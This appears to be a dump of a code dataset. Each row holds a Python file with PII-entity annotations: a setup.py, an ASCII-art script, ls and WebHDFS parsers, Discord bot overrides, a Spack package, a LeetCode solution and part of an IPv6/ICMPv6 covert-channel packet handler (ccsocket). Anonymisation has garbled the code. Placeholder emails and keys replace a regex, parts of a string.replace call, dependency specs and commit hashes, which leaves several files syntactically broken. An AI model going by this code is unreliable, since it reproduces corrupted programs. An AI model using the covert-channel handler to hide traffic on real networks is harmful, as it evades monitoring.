'md.fi'], ['URL', 'self.cr'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.su'], ['URL', 'md.fi'], ['URL', 'self.cu'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.sn'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.ca'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.be'], ['URL', 'md.fi'], ['URL', 'self.be'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.pro'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.no'], ['URL', 'md.fi'], ['URL', 'self.so'], ['URL', 'self.so'], ['URL', 'self.no'], ['URL', 'self.bb'], ['URL', 'spdom.so'], ['URL', 'self.ma'], ['URL', 'self.ma'], ['URL', 'spdom.no'], ['URL', 'self.th'], ['URL', 'self.pl'], ['URL', 'md.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'self.th'], ['URL', 'md.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'self.pl'], ['URL', 'md.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'md.fi'], ['URL', 'self.cn'], ['URL', 'md.fi'], ['URL', 'self.cn'], ['URL', 'md.fi'], ['URL', 'self.cn'], ['URL', 'md.fi'], ['URL', 'self.ad'], ['URL', 'md.fi'], ['URL', 'self.ad'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.st'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.co'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.at'], ['URL', 'md.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'self.at'], ['URL', 'md.fi'], ['URL', 'val.fi'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'md.fi'], ['URL', 'self.me'], ['URL', 'md.fi'], ['URL', 'self.me'], ['URL', 'md.fi'], ['URL', 'self.me'], ['URL', 'md.fi'], ['URL', 'self.me'], ['URL', 'md.fi'], ['URL', 'self.me'], ['URL', 'md.fi'], ['URL', 'self.me'], ['URL', 'md.fi'], ['URL', 'self.me']] |
55 | import sys
from setuptools import setup
tests_require = ["nose>=1.0"]
if sys.version_info < (3,0):
tests_require = ["nose>=1.0", "mock"]
setup(
name="unitils",
version="0.1.2",
author="iLoveTux",
dummy@email.com",
description="Cross platform utilities I have found to be incredibly useful",
license="GPLv3",
keywords="utility tools cli",
url="http://github.com/ilovetux/unitils",
packages=['unitils'],
install_requires=["colorama"],
entry_points={
"console_scripts": [
"cat.py=unitils.cli:cat",
"cp.py=unitils.cli:cp",
"find.py=unitils.cli:find",
"grep.py=unitils.cli:grep",
"head.py=unitils.cli:head",
"ls.py=unitils.cli:ls",
"mv.py=unitils.cli:mv",
"watch.py=unitils.cli:watch",
"wc.py=unitils.cli:wc",
"which.py=unitils.cli:which",
]
},
test_suite="nose.collector",
tests_require=tests_require,
classifiers=[
"Development Status :: 4 - Beta",
"Topic :: Utilities",
"License :: OSI Approved :: GNU General Public License v3 (GPLv3)",
],
)
| 1,171 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'GPLv3'], ['URL', 'http://github.com/ilovetux/unitils",'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ' :: '], ['URL', 'sys.ve'], ['URL', 'email.com'], ['URL', 'cat.py'], ['URL', 'unitils.cl'], ['URL', 'cp.py'], ['URL', 'unitils.cl'], ['URL', 'find.py'], ['URL', 'unitils.cl'], ['URL', 'grep.py'], ['URL', 'unitils.cl'], ['URL', 'head.py'], ['URL', 'unitils.cl'], ['URL', 'ls.py'], ['URL', 'unitils.cl'], ['URL', 'mv.py'], ['URL', 'unitils.cl'], ['URL', 'watch.py'], ['URL', 'unitils.cl'], ['URL', 'wc.py'], ['URL', 'unitils.cl'], ['URL', 'which.py'], ['URL', 'unitils.cl'], ['URL', 'nose.co']] |
56 | #!/usr/bin/env python
# asciinator.py
#
# Copyright 2014 Christian Diener dummy@email.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
#
from __future__ import print_function # for python2 compat
import sys;
from PIL import Image;
import numpy as np
# ascii chars sorted by "density"
chars = np.asarray(list(' .,:;irsXA253hMHGS#9B&@'))
# check command line arguments
if len(sys.argv) != 4:
print( 'Usage: asciinator.py image scale factor' )
sys.exit()
# set basic program parameters
# f = filename, SC = scale, GCF = gamma correction factor, WCF = width correction factor
f, SC, GCF, WCF = sys.argv[1], float(sys.argv[2]), float(sys.argv[3]), 7.0/4.0
# open, scale and normalize image by pixel intensities
img = Image.open(f)
S = (int(img.size[0]*SC*WCF), int(img.size[1]*SC))
img = np.sum( np.asarray(img.resize(S), dtype="float"), axis=2)
img -= img.min()
img = (1.0 - img/img.max())**GCF*(chars.size-1)
# Assemble and print ascii art
print( "\n".join(("".join(r) for r in chars[img.astype(int)])))
print()
| 1,717 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014'], ['PERSON', 'Christian Diener'], ['LOCATION', 'Boston'], ['LOCATION', 'USA'], ['LOCATION', 'SC'], ['LOCATION', 'SC'], ['URL', 'asciinator.py'], ['URL', 'email.com'], ['URL', 'np.as'], ['URL', 'sys.ar'], ['URL', 'asciinator.py'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'img.si'], ['URL', 'img.si'], ['URL', 'np.su'], ['URL', 'np.as'], ['URL', 'img.re'], ['URL', 'img.ma'], ['URL', 'chars.si'], ['URL', 'img.as']] |
57 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
import datetime
from time import strptime
import re
import os
import json
class FileStatus(object):
def __init__(self, path, rights, nbFiles, owner, group, size, date, relpath = None):
self.path = path
self.rights = rights
self.nbFiles = nbFiles
self.owner = owner
self.group = group
self.size = size
self.date = date
self.relpath = relpath
def __eq__(self, other):
return (self.path == other.path and self.rights == other.rights and
self.nbFiles == other.nbFiles and self.owner == other.owner and self.group == other.group and
self.size == other.size and self.date == other.date)
def is_dir(self):
return self.rights.startswith("d")
def __str__(self):
return self.to_str(0, 0, 0, 0, 0, 0, 0)
def to_str(self, rights_width, nbFiles_width, owner_width, group_width, size_width, date_width, path_with):
if self.is_dir:
nb_files = "-"
else:
nb_files = str(self.nbFiles)
result = "%s %s %s %s %s %s %s" % (self.rights.ljust(rights_width),
nb_files.ljust(nbFiles_width),
self.owner.ljust(owner_width),
self.group.ljust(group_width),
str(self.size).ljust(size_width),
self.date.strftime("%Y-%M-%d %H:%M").ljust(date_width),
self.path.ljust(path_with))
return result.encode("utf-8")
def get_file_statuses_pretty_print(file_statuses):
rights_width = 0
nb_files_width = 0
owner_width = 0
group_width = 0
size_width = 0
date_width = 0
path_width = 0
if len(file_statuses) != 0:
rights_width = max([len(fs.rights) for fs in file_statuses])
nb_files_width = max([len(str(fs.nbFiles)) for fs in file_statuses])
owner_width = max([len(fs.owner) for fs in file_statuses])
group_width = max([len(fs.group) for fs in file_statuses])
size_width = max([len(str(fs.size)) for fs in file_statuses])
date_width = max([len(fs.date.strftime("%Y-%M-%d %H:%M")) for fs in file_statuses])
path_width = max([len(fs.path) for fs in file_statuses])
result = []
for file_status in file_statuses:
result.append(file_status.to_str(rights_width, nb_files_width, owner_width, group_width, size_width, date_width, path_width))
return "\n".join(result)
class LsParser(object):
def __init__(self):
pass
def parse_line(self, line):
regex = "^(dummy@email.com)$"
m = re.match(regex, line, re.UNICODE)
if m is None:
return None
rights = m.group(1)
nbFiles = int(m.group(2))
owner = m.group(3)
group = m.group(4)
size = int(m.group(5))
day = int(m.group(6))
month = m.group(7)
try:
month = strptime(month, '%b').tm_mon
except:
month = [u"jan", u"fév", u"mar", u"avr", u"mai", u"jui", u"juil", u"aoû", u"sep", u"oct", u"nov", u"déc"].index(month) + 1
try:
year = int(m.group(8))
except:
year = datetime.datetime.now().year
filename = m.group(9)
date = datetime.date(year, month, day)
return FileStatus(filename, rights, nbFiles, owner, group, size, date)
def parse(self, output):
result = [self.parse_line(line) for line in output.split("\n")]
return [p for p in result if p is not None]
class WebHdfsParser(object):
def __init__(self, path):
self.path = path
def permissions_to_unix_name(self, is_dir, rights):
is_dir_prefix = 'd' if is_dir else '-'
sticky = False
if len(rights) == 4 and rights[0] == '1':
sticky = True
rights = rights[1:]
dic = {'7': 'rwx', '6': 'rw-', '5': 'r-x', '4': 'r--', '3': '-wx', '2': '-w-', '1': '--x', '0': '---'}
result = is_dir_prefix + ''.join(dic[x] for x in rights)
if sticky:
result = result[:-1] + "t"
return result
def parse_status(self, status):
relpath = status["pathSuffix"]
path = os.path.join(self.path, relpath)
nbFiles = 0
size = status["length"]
owner = status["owner"]
group = status["group"]
is_dir = status["type"] == "DIRECTORY"
right_digits = status["permission"]
rights = self.permissions_to_unix_name(is_dir, right_digits)
parsed_date = datetime.datetime.utcfromtimestamp(int(status["modificationTime"])/1000)
date = datetime.datetime(parsed_date.year, parsed_date.month, parsed_date.day, parsed_date.hour, parsed_date.minute)
return FileStatus(path, rights, nbFiles, owner, group, size, date, relpath)
def parse(self, output):
try:
j = json.loads(output)
except:
print output
return []
if "FileStatuses" not in j or "FileStatus" not in j["FileStatuses"]:
print j
return []
statuses = j["FileStatuses"]["FileStatus"]
result = []
for status in statuses:
result.append(self.parse_status(status))
return result
| 5,405 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['NRP', 'other.nbFiles'], ['PERSON', 'self.owner == other.owner'], ['NRP', 'self.rights.ljust(rights_width'], ['LOCATION', 'self.date.strftime("%Y-%M-%d'], ['NRP', 'owner_width'], ['LOCATION', 'owner_width'], ['DATE_TIME', 'month'], ['DATE_TIME', 'parsed_date.day'], ['URL', 'self.pa'], ['URL', 'self.gr'], ['URL', 'self.si'], ['URL', 'self.re'], ['URL', 'self.pa'], ['URL', 'other.pa'], ['URL', 'self.gr'], ['URL', 'other.gr'], ['URL', 'self.si'], ['URL', 'other.si'], ['URL', 'self.rights.st'], ['URL', 'self.to'], ['URL', 'self.is'], ['URL', 'self.gr'], ['URL', 'self.si'], ['URL', 'self.date.st'], ['URL', 'self.pa'], ['URL', 'fs.gr'], ['URL', 'fs.si'], ['URL', 'fs.date.st'], ['URL', 'fs.pa'], ['URL', 'status.to'], ['URL', 'email.com'], ['URL', 're.ma'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'datetime.datetime.no'], ['URL', 'm.gr'], ['URL', 'self.pa'], ['URL', 'self.pa'], ['URL', 'os.path.jo'], ['URL', 'self.pa'], ['URL', 'self.pe'], ['URL', 'date.ye'], ['URL', 'date.mo'], ['URL', 'self.pa']] |
58 | # coding=utf-8
"""Overrides for Discord.py classes"""
import contextlib
import inspect
import io
import itertools
import re
import discord
from discord.ext.commands import HelpFormatter as HelpF, Paginator, Command
from bot.utils import polr, privatebin
from bot.utils.args import ArgParseConverter as ArgPC
def create_help(cmd, parser):
"""Creates an updated usage for the help command"""
default = cmd.params['args'].default
if cmd.signature.split("[")[-1] == f"args={default}]" if default else "args]":
sio = io.StringIO()
with contextlib.redirect_stdout(sio):
parser.print_help()
sio.seek(0)
s = sio.read()
# Strip the filename and trailing newline from help text
arg_part = s[(len(str(s[7:]).split()[0]) + 8):-1]
k = cmd.qualified_name
spt = len(k.split())
# Remove a duplicate command name + leading arguments
split_sig = cmd.signature.split()[spt:]
return "[".join((" ".join(split_sig)).split("[")[:-1]) + arg_part
return cmd.usage
class HelpFormatter(HelpF):
"""Custom override for the default help command"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._paginator = None
async def format(self):
"""Handles the actual behaviour involved with formatting.
To change the behaviour, this method should be overridden.
Returns
--------
list
A paginated output of the help command.
"""
self._paginator = Paginator()
# we need a padding of ~80 or so
description = self.command.description if not self.is_cog() else inspect.getdoc(self.command)
if description:
# <description> portion
self._paginator.add_line(description, empty=True)
if isinstance(self.command, Command):
# <signature portion>
if self.command.params.get("args", None) and type(self.command.params['args'].annotation) == ArgPC:
self.command.usage = create_help(self.command, self.command.params['args'].annotation.parser)
signature = self.get_command_signature()
self._paginator.add_line(signature, empty=True)
# <long doc> section
if self.command.help:
self._paginator.add_line(self.command.help, empty=True)
# end it here if it's just a regular command
if not self.has_subcommands():
self._paginator.close_page()
return self._paginator.pages
max_width = self.max_name_size
def category(tup):
"""Splits the help command into categories for easier readability"""
cog = tup[1].cog_name
# we insert the zero width space there to give it approximate
# last place sorting position.
return cog + ':' if cog is not None else '\u200bNo Category:'
filtered = await self.filter_command_list()
if self.is_bot():
data = sorted(filtered, key=category)
for category, commands in itertools.groupby(data, key=category):
# there simply is no prettier way of doing this.
commands = sorted(commands)
if len(commands) > 0:
self._paginator.add_line(category)
self._add_subcommands_to_page(max_width, commands)
else:
filtered = sorted(filtered)
if filtered:
self._paginator.add_line('Commands:')
self._add_subcommands_to_page(max_width, filtered)
# add the ending note
self._paginator.add_line()
ending_note = self.get_ending_note()
self._paginator.add_line(ending_note)
return self._paginator.pages
_mentions_transforms = {
'@everyone': '@\u200beveryone',
'@here': '@\u200bhere'
}
_mention_pattern = re.compile('|'.join(_mentions_transforms.keys()))
def _is_submodule(parent, child):
return parent == child or child.startswith(parent + ".")
async def _default_help_command(ctx, *commands: str):
"""Shows this message."""
bot = ctx.bot
destination = ctx.message.author if bot.pm_help else ctx.message.channel
def repl(obj):
return _mentions_transforms.get(obj.group(0), '')
# help by itself just lists our own commands.
if len(commands) == 0:
pages = await bot.formatter.format_help_for(ctx, bot)
elif len(commands) == 1:
# try to see if it is a cog name
name = _mention_pattern.sub(repl, commands[0])
command = None
if name in bot.cogs:
command = bot.cogs[name]
else:
command = bot.all_commands.get(name)
if command is None:
await destination.send(bot.command_not_found.format(name))
return
pages = await bot.formatter.format_help_for(ctx, command)
else:
name = _mention_pattern.sub(repl, commands[0])
command = bot.all_commands.get(name)
if command is None:
await destination.send(bot.command_not_found.format(name))
return
for key in commands[1:]:
try:
key = _mention_pattern.sub(repl, key)
command = command.all_commands.get(key)
if command is None:
await destination.send(bot.command_not_found.format(key))
return
except AttributeError:
await destination.send(bot.command_has_no_subcommands.format(command, key))
return
pages = await bot.formatter.format_help_for(ctx, command)
if bot.pm_help is None:
characters = sum(map(len, pages))
# modify destination based on length of pages.
if characters > 1000:
destination = ctx.message.author
for page in pages:
try:
await destination.send(page)
except discord.Forbidden:
destination = ctx.message.channel
await destination.send(page)
old_send = discord.abc.Messageable.send
async def send(self, content=None, **kwargs):
"""Overrides default send method in order to create a paste if the response is more than 2000 characters"""
if content is not None and any(x in str(content) for x in ["@everyone", "@here"]):
content = content.replace("@everyone", dummy@email.com("@here", "@h\u0435re")
if content is not None and len(str(content)) > 2000:
if content.startswith("```py"):
content = "\n".join(content.split("\n")[1:-1])
paste = await privatebin.upload(content, expires="15min", server=self.bot.priv)
if self.bot.polr:
paste = await polr.shorten(paste, **self.bot.polr)
return await old_send(self, f"Hey, I couldn't handle all the text I was gonna send you, so I put it in a paste!"
f"\nThe link is **{paste}**, but it expires in 15 minutes, so get it quick!",
**kwargs)
else:
return await old_send(self, content, **kwargs)
| 7,157 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Discord.py'], ['PERSON', 'sio = io.'], ['PERSON', 'StringIO'], ['LOCATION', 'parser.print_help'], ['PERSON', 'self.is_cog'], ['PERSON', 'self.is_bot'], ['LOCATION', 'bot.pm_help'], ['LOCATION', 'bot.pm_help'], ['DATE_TIME', '15 minutes'], ['URL', 'Discord.py'], ['URL', 'discord.ext.com'], ['URL', 'bot.utils.ar'], ['URL', 'cmd.pa'], ['URL', 'cmd.si'], ['URL', 'io.St'], ['URL', 'contextlib.red'], ['URL', 'parser.pr'], ['URL', 'sio.se'], ['URL', 'sio.re'], ['URL', 'cmd.si'], ['URL', 'cmd.us'], ['URL', 'self.command.de'], ['URL', 'self.is'], ['URL', 'inspect.ge'], ['URL', 'self.com'], ['URL', 'paginator.ad'], ['URL', 'self.com'], ['URL', 'self.command.params.ge'], ['URL', 'self.command.pa'], ['URL', 'self.command.us'], ['URL', 'self.com'], ['URL', 'self.command.pa'], ['URL', '.annotation.pa'], ['URL', 'self.ge'], ['URL', 'paginator.ad'], ['URL', 'self.com'], ['URL', 'paginator.ad'], ['URL', 'self.com'], ['URL', 'paginator.cl'], ['URL', 'paginator.pa'], ['URL', 'self.ma'], ['URL', 'self.fi'], ['URL', 'self.is'], ['URL', 'itertools.gr'], ['URL', 'paginator.ad'], ['URL', 'paginator.ad'], ['URL', 'paginator.ad'], ['URL', 'self.ge'], ['URL', 'paginator.ad'], ['URL', 'paginator.pa'], ['URL', 're.com'], ['URL', 'transforms.ke'], ['URL', 'child.st'], ['URL', 'ctx.bo'], ['URL', 'ctx.message.au'], ['URL', 'bot.pm'], ['URL', 'ctx.message.ch'], ['URL', 'transforms.ge'], ['URL', 'obj.gr'], ['URL', 'bot.formatter.fo'], ['URL', 'pattern.su'], ['URL', 'bot.co'], ['URL', 'bot.co'], ['URL', 'bot.al'], ['URL', 'commands.ge'], ['URL', 'destination.se'], ['URL', 'bot.com'], ['URL', 'found.fo'], ['URL', 'bot.formatter.fo'], ['URL', 'pattern.su'], ['URL', 'bot.al'], ['URL', 'commands.ge'], ['URL', 'destination.se'], ['URL', 'bot.com'], ['URL', 'found.fo'], ['URL', 'pattern.su'], ['URL', 'command.al'], ['URL', 'commands.ge'], ['URL', 'destination.se'], ['URL', 'bot.com'], ['URL', 'found.fo'], ['URL', 'destination.se'], ['URL', 'bot.com'], ['URL', 'subcommands.fo'], ['URL', 'bot.formatter.fo'], ['URL', 'bot.pm'], ['URL', 'ctx.message.au'], ['URL', 'destination.se'], ['URL', 'discord.Fo'], ['URL', 'ctx.message.ch'], ['URL', 'destination.se'], ['URL', 'discord.abc.Messageable.se'], ['URL', 'content.re'], ['URL', 'email.com'], ['URL', 'content.st'], ['URL', 'self.bot.pr'], ['URL', 'self.bo'], ['URL', 'polr.sh'], ['URL', 'self.bo']] |
59 | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, dummy@email.com, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RLimma(RPackage):
"""Data analysis, linear models and differential expression
for microarray data."""
homepage = "https://www.bioconductor.org/packages/limma/"
url = "https://git.bioconductor.org/packages/limma"
list_url = homepage
version('3.32.10', git='https://git.bioconductor.org/packages/limma', commit='PI:KEY')
version('3.32.6', 'PI:KEY')
depends_on(dummy@email.com', dummy@email.com')
| 1,694 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', 'https://git.bioconductor.org/packages/limma"'], ['URL', "https://git.bioconductor.org/packages/limma',"], ['DATE_TIME', '2013-2017'], ['PERSON', 'Todd Gamblin'], ['DATE_TIME', 'February 1999'], ['LOCATION', 'Boston'], ['LOCATION', 'USA'], ['URL', 'https://github.com/llnl/spack'], ['URL', 'https://www.bioconductor.org/packages/limma/"'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com']] |
60 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
*****************************************
Author: zhlinh
Email: dummy@email.com
Version: 0.0.1
Created Time: 2016-03-11
Last_modify: 2016-03-11
******************************************
'''
'''
Given a 2D board containing 'X' and 'O',
capture all regions surrounded by 'X'.
A region is captured by flipping all 'O's
into 'X's in that surrounded region.
For example,
X X X X
X O O X
X X O X
X O X X
After running your function, the board should be:
X X X X
X X X X
X X X X
X O X X
'''
class Solution(object):
def solve(self, board):
"""
:type board: List[List[str]]
:rtype: void Do not return anything, modify board in-place instead.
"""
m = len(board)
if m < 2:
return
n = len(board[0])
for i in range(m):
self.helper(board, i, 0, m, n)
if n > 1:
self.helper(board, i, n - 1, m, n)
for j in range(n):
self.helper(board, 0, j, m, n)
if m > 1:
self.helper(board, m - 1, j, m, n)
for i in range(m):
for j in range(n):
if board[i][j] == 'O':
board[i][j] = 'X'
if board[i][j] == '1':
board[i][j] = 'O'
def helper(self, board, i, j, m, n):
if board[i][j] == 'O':
board[i][j] = '1'
# trick here, normally it could be i >= 1.
# but the boardary will alays get checked.
# so i == 1, then check 0 is duplicated.
if i > 1:
self.helper(board, i - 1, j, m, n)
if i < m - 2:
self.helper(board, i + 1, j, m, n)
if j > 1:
self.helper(board, i, j - 1, m, n)
if j < n - 2:
self.helper(board, i, j + 1, m, n)
| 1,908 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2016-03-11'], ['DATE_TIME', '2016-03-11'], ['URL', 'email.com']] |
61 | #!/usr/bin/python
# -*- coding: UTF-8 -*-
## This file is part of ccsocket
## Copyright (C) Tomas Dragoun dummy@email.com
## This program is published under a GPLv3 license
########################################################
import nfqueue
import sys
import signal
from multiprocessing import Process, Pipe, Lock
from socket import AF_INET6
from scapy.all import *
from scapy.layers.inet6 import ICMPv6Unknown
from headers import IPv6ExtHdrAH
from constants import Constants
############################
## ##
## NFQHandler ##
## ##
############################
class NFQHandler(Process):
#----------------------------------------------------------------------------------
'''
This class handles netfilter queue. Is connected with a parent process
via pipe. Messages are decoded and removed from incoming packets, data
are send to pipe. In passive mode intercept queue both incoming outgo-
ing traffic. Inherits multiprocessing.Process
'''
#----------------------------------------------------------------------------------
def __init__(self, encoder, pipe, sendevt, stopevt, proto, active, address):
''' Call parent's constructor at first '''
Process.__init__(self) # init parent (multiprocessing.Process)
self.name = 'NFQHandler-port ' + str(address[1])
self.daemon = True # set process daemonic
''' Initialize class attributes '''
self._const = Constants()
self._encoder = encoder # encodes message in packet
self._pipe = pipe # exchange data with parent process via pipe
self._can_send = sendevt # event shared with parent process
self._stop_send = stopevt # event shared with parent process
self._proto = proto # upper-layer protocol
self._active = active # mode
self._host = address[0]
self._port = address[1]
'''
Folowing steps prepare netfilter queue with _port as queue
number. There is always only one active queue associated
with given number.
'''
self._queue = nfqueue.queue() # create queue
self._queue.open() # open queue
try:
self._queue.bind(AF_INET6) # set family type AF_INET6
except: # fails when any other queue already runs
pass
self._queue.set_callback(self.handlepacket) # set queue callback
'''
Final step raises RuntimeError in case there is some other
queue with the same number active, queue wasn't closed
properly or user's priviledges are insufficient.
'''
try:
self._queue.create_queue(self._port)
except Exception, e:
raise e
#----------------------------------------------------------------------------------
def __del__(self):
if self._pipe: # close connection with parent process
self._pipe.close()
#----------------------------------------------------------------------------------
def destroyqueue(self):
''' Attempts to close queue '''
if self._queue:
#print 'stopping queue ' + str(self._port)
self._queue.close() # close queue
self._queue = None
#----------------------------------------------------------------------------------
def _clear(self):
''' Removes all data to send from pipe and sets state to idle '''
while self._pipe.poll(): # clear pipe
self._pipe.recv()
self._can_send.set()
self._stop_send.clear()
#----------------------------------------------------------------------------------
def run(self):
'''
Runs endless loop. Every time a packet is occurs in queue
_handlepacket method is called.
'''
#print 'starting queue ' + str(self._port)
self._queue.try_run()
#----------------------------------------------------------------------------------
def handlepacket(self, number, payload):
''' Queue callback function '''
packet = IPv6(payload.get_data()) # decode packet from queue as IPv6
'''
Check if packet belongs to this queue - upperlayer ID field must match
in active mode.
'''
modify, reroute = self._checkport(packet)
if not modify:
'''
Reroute packet to correct queue. Verdict NF_QUEUE is 32-bit
number. Lower 16 bits code this verdict and upper 16 bits
are used to identify target queue.
'''
if reroute != -1:
error = payload.set_verdict(nfqueue.NF_QUEUE | (reroute << 16))
if not error:
return
'''
Packet doesn't have icmp echo layer or target port isn't active,
accept packet
'''
payload.set_verdict(nfqueue.NF_ACCEPT)
return
'''
Port is ok, we need to check if address matches. Ip6tables rules filter
addresses, but packet might have been rerouted from other queue.
'''
if len(self._host): # check source/destination address
if packet.src != self._host and packet.dst != self._host:
payload.set_verdict(nfqueue.NF_ACCEPT)
return
'''
Nfqueue mark is used to distinguish between incoming and outgoing
packets. Each packet is marked.
'''
mark = payload.get_nfmark() # get mark of this packet
if mark == 1: # incoming packet
self._incoming(packet, payload)
elif mark == 2: # outgoing packet
self._outgoing(packet, payload)
#----------------------------------------------------------------------------------
def _incoming(self, packet, payload):
message = self._encoder.getmessage(packet) # decode message
if message is None: # no message
''' Accept packet '''
payload.set_verdict(nfqueue.NF_ACCEPT)
else:
''' Remove message and pass modified packet to queue '''
modified_packet = self._encoder.removemessage(packet)
payload.set_verdict_modified(nfqueue.NF_ACCEPT,
str(modified_packet),
len(modified_packet))
try:
if not len(message):
return
except:
pass
self._pipe.send((message, (packet.src, self._port, 0, 0)))
#----------------------------------------------------------------------------------
def _outgoing(self, packet, payload):
if self._stop_send.is_set():
self._clear()
if self._pipe.poll(): # any data to send?
message = self._pipe.recv() # get message
''' Encode message and return modified packet to queue '''
modified_packet = self._encoder.addmessage(message, (packet, None))
payload.set_verdict_modified(nfqueue.NF_ACCEPT,
str(modified_packet),
len(modified_packet))
if not self._pipe.poll(): # sending finished
self._can_send.set()
else: # nothing to send, return packet to queue
payload.set_verdict(nfqueue.NF_ACCEPT)
#----------------------------------------------------------------------------------
def _checkport(self, packet):
'''
Returns tuple (bool, value). True, if packet belongs to this queue. In pa-
ssive mode always returns True. In active mode upperlayer id field must ma-
tch current _port number. Value is number of queue where will be packet re-
routed.
'''
''' Passive mode - override icmp id check '''
if not self._active:
return (True, 0)
''' Active mode - check icmp (or fragment) id field (~ represents port) '''
if packet.haslayer(ICMPv6EchoRequest): # upperlayer ICMPv6EchoRequest
id = packet[ICMPv6EchoRequest].id
elif packet.haslayer(ICMPv6EchoReply): # upperlayer ICMPv6EchoReply
id = packet[ICMPv6EchoReply].id
elif packet.haslayer(IPv6ExtHdrFragment): # fragmented packet
id = packet[IPv6ExtHdrFragment].id
elif packet.haslayer(ICMPv6Unknown) and packet.haslayer(IPv6ExtHdrAH):
type = packet[ICMPv6Unknown].type # ICMPv6 packet with AH
if type != 128 and type != 129:
return (False, -1) # accept packet
packet[IPv6ExtHdrAH].decode_payload_as(ICMPv6EchoRequest)
id = packet[ICMPv6EchoRequest].id
elif self._proto == self._const.PROTO_ALL: # any protocol
return (True, 0) # id matches port number
else:
return (False, -1) # accept packet
if id == self._port:
return (True, 0) # id matches port number
else:
return (False, id) # reroute to correct queue
#----------------------------------------------------------------------------------
| 9,616 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Tomas Dragoun'], ['PERSON', 'GPLv3'], ['LOCATION', '#'], ['LOCATION', '#'], ['LOCATION', 'stopevt'], ['PERSON', 'self._active'], ['PERSON', 'Verdict NF_QUEUE'], ['PERSON', 'upperlayer ICMPv6EchoRequest\n i'], ['PERSON', 'AH'], ['URL', 'email.com'], ['URL', 'scapy.al'], ['URL', 'scapy.layers.in'], ['URL', 'multiprocessing.Pro'], ['URL', 'multiprocessing.Pro'], ['URL', 'self.na'], ['URL', 'queue.bi'], ['URL', 'queue.se'], ['URL', 'queue.cr'], ['URL', 'pipe.cl'], ['URL', 'queue.cl'], ['URL', 'pipe.re'], ['URL', 'send.se'], ['URL', 'send.cl'], ['URL', 'queue.tr'], ['URL', 'payload.ge'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'packet.sr'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'payload.ge'], ['URL', 'encoder.ge'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'encoder.re'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'pipe.se'], ['URL', 'packet.sr'], ['URL', 'send.is'], ['URL', 'pipe.re'], ['URL', 'encoder.ad'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'send.se'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], 